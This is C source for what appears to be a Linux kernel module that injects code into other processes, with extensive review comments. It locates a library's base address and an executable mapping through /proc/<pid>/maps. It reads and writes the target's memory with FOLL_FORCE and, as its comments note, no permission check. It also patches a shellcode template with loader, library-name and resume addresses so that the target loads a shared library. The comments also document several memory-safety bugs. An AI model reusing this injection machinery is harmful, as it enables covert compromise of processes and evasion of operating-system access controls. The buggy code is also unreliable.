#include "utils.h"
#include <linux/mm.h>
#include <linux/sched/mm.h>
#include <linux/slab.h>
#include <linux/gfp.h>
#include "file.h"
#include "so_shellcode_loader.h"
/*
 * Scan /proc/<pid>/maps line by line and return the start address of the
 * first mapping whose line contains the substring `library`.
 *
 * @pid:     target process; its maps file is read through the project's
 *           file_open()/file_read()/file_close() helpers (file.h), whose
 *           exact contracts are not visible in this file.
 * @library: matched against the whole maps line with strstr(), i.e. a
 *           substring match: "libc" also matches a "libcrypto" line.
 *
 * Returns the parsed start address cast to a pointer, or NULL when the
 * maps file cannot be opened or no line matches.
 *
 * Review notes (documented, not changed here):
 *  - kmalloc() is not checked for NULL before strncpy() writes into `line`.
 *  - strncpy() copies exactly `size` bytes and the extra byte reserved by
 *    kmalloc(size + 1) is never written; kmalloc() does not zero memory, so
 *    `line` is not reliably NUL-terminated when sscanf()/strstr() read it.
 *  - `addr` is assigned only by sscanf(); if the matching line does not
 *    parse, an uninitialized value is returned.
 *  - only a return of exactly 0 from file_read() ends the loop; a negative
 *    return (if file_read() signals errors that way — confirm) would be
 *    used as a length.
 */
void* find_lib_address(pid_t pid, char* library) {
    struct file* fp;
    char filename[30];   /* "/proc/<int>/maps" is at most 22 chars + NUL */
    char data[850];      /* one read window of the maps file; may span several lines */
    char* line;          /* kmalloc'd copy of the current line */
    unsigned long addr;  /* start address parsed from the current line */
    int offset = 0;      /* file position at which the current line begins */
    char* substring;
    int size = 0;
    sprintf(filename, "/proc/%d/maps", pid);
    fp = file_open(filename, O_RDONLY, 0);
    if(NULL == fp) {
        return NULL;
    }
    while(true) {
        /* Each iteration re-reads from `offset`, so the window always
         * starts at the beginning of a line. */
        size = file_read(fp, offset, data, 850);
        if (0 == size) {
            file_close(fp);
            return NULL;
        }
        /* strstr() requires a NUL-terminated `data`; nothing here adds one
         * after a full 850-byte read — assumed to come from file_read(),
         * TODO confirm. */
        substring = strstr(data, "\n");
        if (NULL == substring) {
            substring = data + size;
        }
        size = substring - data;   /* current line length, newline excluded */
        line = kmalloc(size + 1, GFP_KERNEL);
        strncpy(line, data, size);
        /* maps line layout: "start-end perms offset dev inode [path]";
         * only the start address is kept. */
        sscanf(line, "%lx-%*x %*s %*s %*s %*d", &addr);
        if(strstr(line, library) != NULL) {
            kfree(line);
            break;
        }
        kfree(line);
        offset += size + 1;   /* +1 skips the newline itself */
    }
    file_close(fp);
    return (void*)addr;
}
/*
 * Scan /proc/<pid>/maps and return the start address of the first mapping
 * whose permission field contains an 'x', i.e. the first executable
 * mapping of the target process.
 *
 * @pid: target process; its maps file is read through the project's
 *       file_open()/file_read()/file_close() helpers (file.h).
 *
 * Returns the mapping's start address cast to a pointer, or NULL when the
 * maps file cannot be opened or no executable mapping is found.
 *
 * Review notes (documented, not changed here):
 *  - same kmalloc() NULL check and NUL-termination gaps as
 *    find_lib_address(): `line` gets `size` bytes from strncpy() and the
 *    byte at line[size] is never written.
 *  - the two "%s" conversions have no field width; `perms` (5 bytes) and
 *    `str` (20 bytes) are only safe for well-formed maps lines.
 *  - `perms` is assigned only when sscanf() matches the line; on a line
 *    that does not parse, the strstr() test reads whatever the array held
 *    before (uninitialized on the first iteration).
 *  - `str` receives the dev field but is never used.
 */
void* find_executable_space(pid_t pid) {
    struct file* fp;
    char filename[30];   /* "/proc/<int>/maps" is at most 22 chars + NUL */
    char data[850];      /* one read window of the maps file */
    char* line;          /* kmalloc'd copy of the current line */
    unsigned long addr;  /* start address parsed from the current line */
    char str[20];        /* 4th field (dev), parsed but unused */
    char perms[5];       /* 2nd field, e.g. "r-xp" */
    int offset = 0;      /* file position at which the current line begins */
    char* substring;
    int size = 0;
    sprintf(filename, "/proc/%d/maps", pid);
    fp = file_open(filename, O_RDONLY, 0);
    if(NULL == fp) {
        return NULL;
    }
    while(true) {
        size = file_read(fp, offset, data, 850);
        if (0 == size) {
            file_close(fp);
            return NULL;
        }
        /* strstr() requires a NUL-terminated `data` — assumed to be
         * provided by file_read(), TODO confirm. */
        substring = strstr(data, "\n");
        if (NULL == substring) {
            substring = data + size;
        }
        size = substring - data;   /* current line length, newline excluded */
        line = kmalloc(size + 1, GFP_KERNEL);
        strncpy(line, data, size);
        /* "start-end perms offset dev inode": keep start, perms and dev. */
        sscanf(line, "%lx-%*x %s %*s %s %*d", &addr, perms, str);
        kfree(line);
        if(strstr(perms, "x") != NULL) {
            break;
        }
        offset += size + 1;   /* +1 skips the newline itself */
    }
    file_close(fp);
    return (void*)addr;
}
/*
 * Copy `count` bytes between the kernel buffer `buf` and the address space
 * of `task`, starting at target address *ppos. This follows the shape of
 * the mem_rw() helper behind /proc/<pid>/mem, with two differences visible
 * here: `buf` is a kernel buffer (memcpy instead of copy_{from,to}_user),
 * and no ptrace_may_access()-style permission check is made on `task`, so
 * the only access control is whoever can call this function from within
 * the module.
 *
 * @task:  target task; its mm is taken straight from task->mm.
 * @buf:   kernel buffer to copy from (write) or into (read).
 * @count: number of bytes to transfer.
 * @ppos:  in: target address; out: advanced past the bytes transferred
 *         (left unchanged when the mm could not be pinned).
 * @write: non-zero writes into the target, zero reads from it.
 *
 * Returns the number of bytes transferred; 0 when the task has no mm or
 * its mm_users count is already zero; -ENOMEM when the bounce page cannot
 * be allocated; -EIO when access_process_vm() transfers nothing at all.
 * A transfer that stops part-way returns the bytes copied so far.
 */
ssize_t mem_rw(struct task_struct *task, char *buf, size_t count, loff_t *ppos, int write) {
    struct mm_struct *mm = task->mm;   /* NOTE(review): read without task_lock(); confirm task->mm cannot change before atomic_inc_not_zero() below */
    unsigned long addr = *ppos;
    ssize_t copied;
    char *page;                        /* one-page bounce buffer between buf and the target */
    unsigned int flags;
    if (!mm)
        return 0;
    page = (char *)get_zeroed_page(GFP_KERNEL);
    if (!page)
        return -ENOMEM;
    copied = 0;
    /* Pin the mm for the duration of the transfer; a zero mm_users means
     * the mm is already being torn down, so report nothing copied. */
    if (!atomic_inc_not_zero(&mm->mm_users))
        goto free;
    /* Maybe we should limit FOLL_FORCE to actual ptrace users? */
    /* FOLL_FORCE asks access_process_vm() to proceed even where the target
     * mapping's own protection would refuse the access (ptrace semantics). */
    flags = FOLL_FORCE;
    if (write)
        flags |= FOLL_WRITE;
    while (count > 0) {
        int this_len = min_t(int, count, PAGE_SIZE);   /* at most one bounce page per round */
        /* memcpy() returns its destination pointer and never NULL, so this
         * condition cannot be true; it is a leftover of the copy_from_user()
         * failure check in the kernel original. */
        if (write && NULL == memcpy(page, buf, this_len)) {
            copied = -EFAULT;
            break;
        }
        this_len = access_process_vm(task, addr, page, this_len, flags);
        /* Zero bytes accessible: stop, and report -EIO only if nothing at
         * all has been transferred in this call. */
        if (!this_len) {
            if (!copied)
                copied = -EIO;
            break;
        }
        /* Same dead NULL check as above, on the read path. */
        if (!write && NULL == memcpy(buf, page, this_len)) {
            copied = -EFAULT;
            break;
        }
        buf += this_len;
        addr += this_len;
        copied += this_len;
        count -= this_len;
    }
    *ppos = addr;
    mmput(mm);   /* drop the reference taken by atomic_inc_not_zero() */
free:
    free_page((unsigned long) page);
    return copied;
}
/*
 * Read `count` bytes from address `pos` in `task`'s address space into the
 * kernel buffer `buf`. Thin wrapper over mem_rw() with write == 0; the
 * updated position mem_rw() reports is discarded.
 *
 * Returns whatever mem_rw() returns (bytes read, or a negative errno).
 */
ssize_t mem_read(struct task_struct* task, char *buf, size_t count, unsigned long pos) {
    loff_t ppos = pos;   /* mem_rw() advances this; the caller never sees it */
    return mem_rw(task, buf, count, &ppos, 0);
}
/*
 * Write `count` bytes from the kernel buffer `buf` into `task`'s address
 * space at address `pos`. Thin wrapper over mem_rw() with write == 1, so
 * the access is made with FOLL_FORCE | FOLL_WRITE and no permission check
 * on the target; the updated position mem_rw() reports is discarded.
 *
 * Returns whatever mem_rw() returns (bytes written, or a negative errno).
 */
ssize_t mem_write(struct task_struct* task, char *buf, size_t count, unsigned long pos) {
    loff_t ppos = pos;   /* mem_rw() advances this; the caller never sees it */
    return mem_rw(task, buf, count, &ppos, 1);
}
/*
 * Build a patched copy of the code template delimited by the `shellcode`
 * and `end_of_shellcode` symbols (declared via so_shellcode_loader.h).
 * Three 8-byte values are written into the copy at fixed byte offsets:
 * the loader function address (offset 39), the library-name address
 * (offset 49) and the instruction pointer to resume at (offset 99).
 *
 * @shellcode_size:    out: length of the template in bytes.
 * @registers:         saved registers of the target; only ->ip is read.
 * @so_library_name:   value written at offset 49.
 * @load_so_function:  value written at offset 39.
 * @came_from_syscall: when true the resume address is registers->ip - 2;
 *                     2 is the length of the x86-64 `syscall` instruction,
 *                     presumably so the interrupted syscall is re-issued
 *                     afterwards — confirm against the template.
 *
 * Returns a kmalloc'd buffer of *shellcode_size bytes that the caller owns
 * and must kfree(), or NULL when the template is empty.
 *
 * Review notes (documented, not changed here):
 *  - *shellcode_size is size_t, so `0 >= *shellcode_size` is only true for
 *    zero; an inverted symbol order wraps to a huge value and passes.
 *  - kmalloc() is not checked for NULL before memcpy() writes to it.
 *  - the patch offsets are never compared with *shellcode_size; a template
 *    shorter than 107 bytes (99 + 8) would be written past its end, and the
 *    three offsets are tied to the exact byte layout of the template.
 *  - `shellcode_patched + N` is arithmetic on void*, a GCC extension
 *    (sizeof(void) treated as 1) that the kernel build allows.
 */
void* get_shellcode(size_t* shellcode_size, struct pt_regs* registers, unsigned long so_library_name, unsigned long load_so_function, bool came_from_syscall) {
    void* shellcode_patched;
    unsigned long ip;   /* resume address patched in at offset 99 */
    if (came_from_syscall) {
        ip = registers->ip - 2;
    }
    else {
        ip = registers->ip;
    }
    *shellcode_size = (unsigned long)end_of_shellcode - (unsigned long)shellcode;
    /* size_t is unsigned: this only rejects an empty template. */
    if (0 >= *shellcode_size){
        return NULL;
    }
    shellcode_patched = kmalloc(*shellcode_size, GFP_KERNEL);
    memcpy(shellcode_patched, shellcode, *shellcode_size);
    /* Fixed-offset patch slots; no bounds check against *shellcode_size. */
    memcpy(shellcode_patched + 39, (void*)&load_so_function, sizeof(unsigned long));
    memcpy(shellcode_patched + 49, (void*)&so_library_name, sizeof(unsigned long));
    memcpy(shellcode_patched + 99, (void*)&ip , sizeof(unsigned long));
    return shellcode_patched;
}